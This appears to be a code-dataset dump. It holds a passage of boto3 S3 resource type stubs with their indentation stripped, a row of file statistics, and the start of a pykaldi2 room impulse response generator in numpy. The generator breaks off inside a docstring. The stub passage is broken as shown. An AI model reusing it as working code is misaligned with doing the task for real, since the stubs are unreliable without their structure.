def download_file(self, Key: str = None, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put_object(self, Key: str, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'Object':
pass
def upload_file(self, Filename: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def wait_until_exists(self):
pass
def wait_until_not_exists(self):
pass
class BucketAcl(base.ServiceResource):
owner: Dict
grants: List
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None):
pass
def reload(self):
pass
class BucketCors(base.ServiceResource):
cors_rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, CORSConfiguration: Dict):
pass
def reload(self):
pass
class BucketLifecycle(base.ServiceResource):
rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, LifecycleConfiguration: Dict = None):
pass
def reload(self):
pass
class BucketLifecycleConfiguration(base.ServiceResource):
rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, LifecycleConfiguration: Dict = None):
pass
def reload(self):
pass
class BucketLogging(base.ServiceResource):
logging_enabled: Dict
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, BucketLoggingStatus: Dict):
pass
def reload(self):
pass
class BucketNotification(base.ServiceResource):
topic_configurations: List
queue_configurations: List
lambda_function_configurations: List
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, NotificationConfiguration: Dict):
pass
def reload(self):
pass
class BucketPolicy(base.ServiceResource):
policy: str
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, Policy: str, ConfirmRemoveSelfBucketAccess: bool = None):
pass
def reload(self):
pass
class BucketRequestPayment(base.ServiceResource):
payer: str
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, RequestPaymentConfiguration: Dict):
pass
def reload(self):
pass
class BucketTagging(base.ServiceResource):
tag_set: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, Tagging: Dict):
pass
def reload(self):
pass
class BucketVersioning(base.ServiceResource):
status: str
mfa_delete: str
bucket_name: str
def enable(self, MFA: str = None):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, VersioningConfiguration: Dict, MFA: str = None):
pass
def reload(self):
pass
def suspend(self, MFA: str = None):
pass
class BucketWebsite(base.ServiceResource):
redirect_all_requests_to: Dict
index_document: Dict
error_document: Dict
routing_rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, WebsiteConfiguration: Dict):
pass
def reload(self):
pass
class MultipartUpload(base.ServiceResource):
upload_id: str
key: str
initiated: datetime
storage_class: str
owner: Dict
initiator: Dict
bucket_name: str
object_key: str
id: str
parts: 'parts'
def abort(self, RequestPayer: str = None) -> Dict:
pass
def complete(self, MultipartUpload: Dict = None, RequestPayer: str = None) -> 'Object':
pass
def get_available_subresources(self) -> List[str]:
pass
class MultipartUploadPart(base.ServiceResource):
last_modified: datetime
e_tag: str
size: int
bucket_name: str
object_key: str
multipart_upload_id: str
part_number: str
def copy_from(self, CopySource: Union[str, Dict], CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, CopySourceRange: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def upload(self, Body: Union[bytes, IO] = None, ContentLength: int = None, ContentMD5: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
class Object(base.ServiceResource):
delete_marker: bool
accept_ranges: str
expiration: str
restore: str
last_modified: datetime
content_length: int
e_tag: str
missing_meta: int
version_id: str
cache_control: str
content_disposition: str
content_encoding: str
content_language: str
content_type: str
expires: datetime
website_redirect_location: str
server_side_encryption: str
metadata: Dict
sse_customer_algorithm: str
sse_customer_key_md5: str
ssekms_key_id: str
storage_class: str
request_charged: str
replication_status: str
parts_count: int
object_lock_mode: str
object_lock_retain_until_date: datetime
object_lock_legal_hold_status: str
bucket_name: str
key: str
def copy(self, CopySource: Dict = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def copy_from(self, CopySource: Union[str, Dict], ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete(self, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def download_file(self, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def initiate_multipart_upload(self, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'MultipartUpload':
pass
def load(self):
pass
def put(self, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def reload(self):
pass
def restore_object(self, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def upload_file(self, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def wait_until_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
def wait_until_not_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
class ObjectAcl(base.ServiceResource):
owner: Dict
grants: List
request_charged: str
bucket_name: str
object_key: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, RequestPayer: str = None, VersionId: str = None) -> Dict:
pass
def reload(self):
pass
class ObjectSummary(base.ServiceResource):
last_modified: datetime
e_tag: str
size: int
storage_class: str
owner: Dict
bucket_name: str
key: str
def copy_from(self, CopySource: Union[str, Dict], ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete(self, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def initiate_multipart_upload(self, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'MultipartUpload':
pass
def load(self):
pass
def put(self, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def restore_object(self, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def wait_until_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
def wait_until_not_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
class ObjectVersion(base.ServiceResource):
e_tag: str
size: int
storage_class: str
key: str
version_id: str
is_latest: bool
last_modified: datetime
owner: Dict
bucket_name: str
object_key: str
id: str
def delete(self, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def head(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
class buckets(ResourceCollection):
@classmethod
def all(cls) -> List['Bucket']:
pass
@classmethod
def filter(cls) -> List['Bucket']:
pass
@classmethod
def iterator(cls) -> ResourceCollection:
pass
@classmethod
def limit(cls) -> List['Bucket']:
pass
@classmethod
def page_size(cls) -> List['Bucket']:
pass
@classmethod
def pages(cls) -> List[base.ServiceResource]:
pass
| 40.010327 | 1,088 | 0.692807 | 2,556 | 23,246 | 6.226135 | 0.090376 | 0.148674 | 0.027774 | 0.036132 | 0.815257 | 0.78698 | 0.764798 | 0.740794 | 0.729106 | 0.717481 | 0 | 0.00158 | 0.210531 | 23,246 | 580 | 1,089 | 40.07931 | 0.865573 | 0 | 0 | 0.653465 | 0 | 0 | 0.01596 | 0.001205 | 0 | 0 | 0 | 0 | 0 | 1 | 0.324257 | false | 0.334158 | 0.027228 | 0 | 0.660891 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
6d8e4c0cbacab3919d6dd6d644dc9752e9d72e3c | 19,179 | py | Python | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 179 | 2019-07-11T04:29:17.000Z | 2022-02-26T08:11:09.000Z | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 15 | 2019-07-26T04:59:36.000Z | 2021-12-08T05:25:06.000Z | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 31 | 2019-07-11T04:29:24.000Z | 2021-07-22T01:38:22.000Z | import numpy as np
# import cupy
def t60_to_alpha(room, t60):
V = np.prod(room)
c = 343
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * np.log(10) / (c * S * t60)
return alpha
def min_t60_of_room(room):
V = np.prod(room)
c = 343
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
min_t60 = 24 * V * np.log(10) / (c * S)
return min_t60 * 1.1
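The two helpers above are inverses of the same Sabine-style relation between reverberation time and average wall absorption. A minimal standalone check of that relation (plain numpy; the room dimensions are the ones used in the doctests of `xp_rirgen`):

```python
import numpy as np

def t60_to_alpha(room, t60):
    # average absorption coefficient implied by a target T60
    # (same formula as the module helper above)
    V = np.prod(room)
    c = 343
    S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
    return 24 * V * np.log(10) / (c * S * t60)

room = np.array([4.0, 7.0, 3.0])     # 4 m x 7 m x 3 m shoebox room
alpha = t60_to_alpha(room, t60=0.5)  # ~0.222, i.e. physically realizable (< 1)
```

Values of `alpha >= 1` mean the requested T60 is shorter than the room can support, which is exactly the condition `xp_rirgen` rejects below.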
def xp_rirgen(room, source_loc, mic_loc, c=340, fs=16000, t60=0.5,
beta=None, nsamples=None, htw=None, hpfilt=True, habets_compat=False, method=1):
"""Generates room impulse responses corresponding to each source-microphone pair placed in a room.
Args:
room (numpy/cupy array) = room dimensions in meters, shape: (3, 1)
source_loc (numpy/cupy array) = source locations in meters, shape: (3, nsrc)
mic_loc (numpy/cupy array) = microphone locations in meters, shape: (3, nmic)
kwargs:
c (float) = speed of sound in meters/second (default: 340)
fs (float) = sampling rate in Hz (default: 16000)
t60 (float) = t60 or rt60 in seconds or None to use beta parameters (default: 0.5)
beta (numpy/cupy array) = beta parameters of reflections for each side, shape (6,1) (default: None)
nsamples (int) = number of output samples (default: auto from t60)
htw (int) = half size in samples of the time window used for sinc function interpolation (default automatic)
hpfilt (bool) = use post-generation highpass filter or not (default True)
method (int) = 1 or 2, 2 is not tested thoroughly and is very slow, so use 1 always (default 1)
Returns:
room impulse responses in time-domain of shape (nsrc, nmic, nsamples)
Notes:
1. If input arrays are cupy arrays (on GPU), the code runs with cupy, otherwise with numpy
2. if you do not want to install cupy or not interested in GPU processing,
remove line "import cupy" and replace "xp=cupy.get..." with "xp=np"
.. seealso:: :func:`pyrirgen.RirGenerator`
.. seealso:: :url:https://github.com/ehabets/RIR-Generator/blob/master/rir_generator.cpp
>>> ### DOCTEST ###
>>> room = np.array([4,7,3]).reshape(3,1)
>>> source_loc = np.random.uniform(0,1,(3,2)) * room
>>> mic_loc = np.random.uniform(0,1,(3,4)) * room
>>> t60=0.3
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60)
>>> #import matplotlib.pyplot as plt
>>> #plt.plot(rirs_np[0,0,:] , label='rir for src1 and mic1')
>>> croom = cupy.array(room)
>>> csource_loc = cupy.array(source_loc)
>>> cmic_loc = cupy.array(mic_loc)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, t60=t60)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> beta = np.random.uniform(0.1, 0.9, size=6)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, beta=beta, t60=None)
>>> cbeta = cupy.array(beta)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, beta=cbeta, t60=None)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60, habets_compat=True)
"""
# xp = cupy.get_array_module(room, source_loc, mic_loc, beta)
    xp = np
if beta is None and t60 is None:
raise Exception('Either t60 or beta array must be provided')
elif beta is None:
V = xp.prod(room)
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * xp.log(10) / (c * S * t60)
if alpha < 1:
beta = xp.ones(6, ) * xp.sqrt(1 - alpha)
else:
raise Exception('t60 value {} too small for the room'.format(t60))
else:
if xp.max(beta) >= 1.0 or xp.min(beta) <= 0.0:
raise Exception('beta array values should be in the interval (0,1).')
if t60 is not None:
print('Overwriting provided t60 value using provided beta array')
alpha = 1 - beta**2
V = xp.prod(room)
Se = 2 * (room[1] * room[2] * (alpha[0] + alpha[1]) + room[0] * room[2] * (alpha[2] + alpha[3]) + room[0] * room[1] * (alpha[4] + alpha[5]))
        t60 = 24 * xp.log(10.0) * V / (c * Se)
if htw is None:
htw = np.minimum(32, int(xp.min(room) / 10 / c * fs))
if habets_compat:
htw = 64
tw_idx = xp.arange(0, 2 * htw).reshape(2 * htw, 1)
try:
assert(xp.all(room.T - mic_loc.T > 0) and xp.all(room.T - source_loc.T > 0))
assert(xp.all(mic_loc.T > 0) and xp.all(source_loc.T > 0))
    except AssertionError:
        raise Exception('Room dimensions and source and mic locations are not compatible.')
cTs = c / fs
# convert distances in meters to time-delays in samples
room = room / cTs
mic_loc = mic_loc / cTs
src_loc = source_loc / cTs
nmic = mic_loc.shape[-1]
nsrc = source_loc.shape[-1]
if nsamples is None:
nsamples = int(fs * t60)
def get_reflection_candidates():
nxrefl = int(nsamples / (room[0]))
nyrefl = int(nsamples / (room[1]))
nzrefl = int(nsamples / (room[2]))
xro = xp.arange(-nxrefl, nxrefl + 1)
yro = xp.arange(-nyrefl, nyrefl + 1)
zro = xp.arange(-nzrefl, nzrefl + 1)
xr = xro.reshape(2 * nxrefl + 1, 1, 1)
yr = yro.reshape(1, 2 * nyrefl + 1, 1)
zr = zro.reshape(1, 1, 2 * nzrefl + 1)
RoughDelays = xp.sqrt((2 * xr * room[0]) ** 2 + (2 * yr * room[1]) ** 2 + (2 * zr * room[2]) ** 2)
RoughGains = (beta[0] * beta[1]) ** xp.abs(xr) * (beta[2] * beta[3]) ** xp.abs(yr) * (beta[4] * beta[5]) ** xp.abs(zr) / (
RoughDelays + 0.5 / c * fs) # assume src-mic distance at least .5 metres
maxgain = xp.max(RoughGains)
vreflidx = xp.vstack(xp.nonzero(xp.logical_and(RoughDelays < nsamples, RoughGains > maxgain / 1.0e4)))
nrefl = vreflidx.shape[-1]
reflidx = xp.arange(nrefl).reshape(1, 1, nrefl, 1, 1, 1)
xrefl = xro[vreflidx[..., reflidx][0]]
yrefl = yro[vreflidx[..., reflidx][1]]
zrefl = zro[vreflidx[..., reflidx][2]]
return xrefl, yrefl, zrefl
xrefl, yrefl, zrefl = get_reflection_candidates()
def get_delays_and_gains():
xside = xp.arange(0, 2).reshape(1, 1, 1, 2, 1, 1)
yside = xp.arange(0, 2).reshape(1, 1, 1, 1, 2, 1)
zside = xp.arange(0, 2).reshape(1, 1, 1, 1, 1, 2)
imic = xp.arange(nmic).reshape(1, nmic, 1, 1, 1, 1)
isrc = xp.arange(nsrc).reshape(nsrc, 1, 1, 1, 1, 1)
Delays = xp.sqrt((2 * xrefl * room[0] - mic_loc[0, imic] + (1 - 2 * xside) * src_loc[0, isrc]) ** 2 + (2 * yrefl * room[1] - mic_loc[1, imic] + (1 - 2 * yside) * src_loc[1, isrc]) ** 2 + (2 * zrefl * room[2] - mic_loc[2, imic] + (1 - 2 * zside) * src_loc[2, isrc]) ** 2)
Refl_x = beta[0] ** (xp.abs(xrefl - xside)) * beta[1] ** (xp.abs(xrefl))
Refl_y = beta[2] ** (xp.abs(yrefl - yside)) * beta[3] ** (xp.abs(yrefl))
Refl_z = beta[4] ** (xp.abs(zrefl - zside)) * beta[5] ** (xp.abs(zrefl))
Gains = Refl_x * Refl_y * Refl_z / (4 * np.pi * Delays * cTs)
# Gains[Delays > nsamples] = 0.0
return Delays, Gains
Delays, Gains = get_delays_and_gains()
rirs = xp.zeros((nsrc, nmic, nsamples), dtype=np.float32)
for src in xp.arange(nsrc):
for mic in xp.arange(nmic):
dnow = Delays[src, mic, ...].flatten()
gnow = Gains[src, mic, ...].flatten()
if method == 1:
gnow = gnow[dnow < nsamples - htw - 2]
dnow = dnow[dnow < nsamples - htw - 2]
dnow_floor = xp.floor(dnow)
dnow_dist = dnow - dnow_floor
dnow_floor = dnow_floor.reshape(1, dnow.shape[0])
dnow_dist = dnow_dist.reshape(1, dnow.shape[0])
gnow = gnow.reshape(1, dnow.shape[0])
dnow_ext = dnow_floor + tw_idx - htw + 1
garg = np.pi * (-dnow_dist + 1 + tw_idx - htw)
gnow_ext = gnow * 0.5 * (1.0 - xp.cos(np.pi + garg / htw)) * xp.where(garg == 0.0, 1.0, xp.sin(garg) / garg)
dnow = dnow_ext.flatten().astype(np.int32)
gnow = gnow_ext.flatten().astype(np.float32)
dvalid = xp.logical_and(dnow >= 0, dnow < nsamples)
gnow = gnow[dvalid]
dnow = dnow[dvalid]
rirnow = xp.zeros((nsamples,), dtype=np.float32)
if xp == np:
np.add.at(rirnow, dnow, gnow)
else:
xp.scatter_add(rirnow, dnow, gnow)
rirs[src, mic, ...] = rirnow
elif method == 2: ## this is too slow and may not be accurate as well
gnow = gnow[dnow < nsamples]
dnow = dnow[dnow < nsamples]
frange = xp.arange(0, 0.5 + 0.5 / nsamples, 1.0 / nsamples)
rirfft = xp.zeros(frange.shape, dtype=np.complex128)
for i in range(len(frange)):
rirfft[i] = xp.sum(gnow * xp.exp(-1j * 2 * np.pi * frange[i] * dnow))
rirs[src, mic, :] = xp.real(xp.fft.irfft(rirfft)).astype(dtype=np.float32)
if habets_compat:
if xp is np:
import scipy.signal
W = 2*np.pi*100/fs
R1 = np.exp(-W)
B1 = 2*R1*np.cos(W)
B2 = -R1 * R1
A1 = -(1+R1)
a = np.array([1, -B1, -B2])
b = np.array([1, A1, R1])
rirs = scipy.signal.lfilter(b, a, rirs, axis=-1)
else:
raise Exception('habets_compat not available for cupy')
elif hpfilt:
        rirs[:, :, 1:-1] += -0.5 * rirs[:, :, 2:] - 0.5 * rirs[:, :, :-2]
return rirs
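Inside `xp_rirgen`, each reflection is written into the impulse response at a fractional sample delay using a Hann-windowed sinc (the `garg`/`gnow_ext` lines above). A self-contained sketch of that interpolation for a single impulse — the constants mirror the code above, but `frac_delay_impulse` is our illustrative name, not part of the module:

```python
import numpy as np

def frac_delay_impulse(delay, nsamples, htw=32):
    # place a unit impulse at a fractional sample delay using a
    # Hann-windowed sinc over 2*htw taps, as xp_rirgen's method 1 does
    out = np.zeros(nsamples, dtype=np.float32)
    d0 = int(np.floor(delay))
    frac = delay - d0
    idx = np.arange(2 * htw)
    garg = np.pi * (-frac + 1 + idx - htw)          # sinc argument per tap
    win = 0.5 * (1.0 - np.cos(np.pi + garg / htw))  # Hann window, 1 at center
    taps = win * np.where(garg == 0.0, 1.0, np.sin(garg) / garg)
    pos = d0 + idx - htw + 1                        # target sample indices
    valid = (pos >= 0) & (pos < nsamples)           # same bounds check as method 1
    np.add.at(out, pos[valid], taps[valid])
    return out

h = frac_delay_impulse(100.3, 256)  # energy peaks at sample 100
```

`np.add.at` is the unbuffered scatter-add used in the numpy path above; the cupy path uses `scatter_add` for the same effect.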
def xp_rirgen2(room, source_loc, mic_loc, c=340, fs=16000, t60=0.5,
beta=None, nsamples=None, htw=None, hpfilt=True, method=1):
"""Generates room impulse responses corresponding to each source-microphone pair placed in a room.
Args:
room (numpy/cupy array) = room dimensions in meters, shape: (3, 1)
source_loc (numpy/cupy array) = source locations in meters, shape: (3, nsrc)
mic_loc (numpy/cupy array) = microphone locations in meters, shape: (3, nmic)
kwargs:
c (float) = speed of sound in meters/second (default: 340)
fs (float) = sampling rate in Hz (default: 16000)
t60 (float) = t60 or rt60 in seconds or None to use beta parameters (default: 0.5)
beta (numpy/cupy array) = beta parameters of reflections for each side, shape (6,1) (default: None)
nsamples (int) = number of output samples (default: auto from t60)
htw (int) = half size in samples of the time window used for sinc function interpolation (default automatic)
hpfilt (bool) = use post-generation highpass filter or not (default True)
method (int) = 1 or 2, 2 is not tested thoroughly and is very slow, so use 1 always (default 1)
Returns:
room impulse responses in time-domain of shape (nsrc, nmic, nsamples)
Notes:
1. If input arrays are cupy arrays (on GPU), the code runs with cupy, otherwise with numpy
2. if you do not want to install cupy or not interested in GPU processing,
remove line "import cupy" and replace "xp=cupy.get..." with "xp=np"
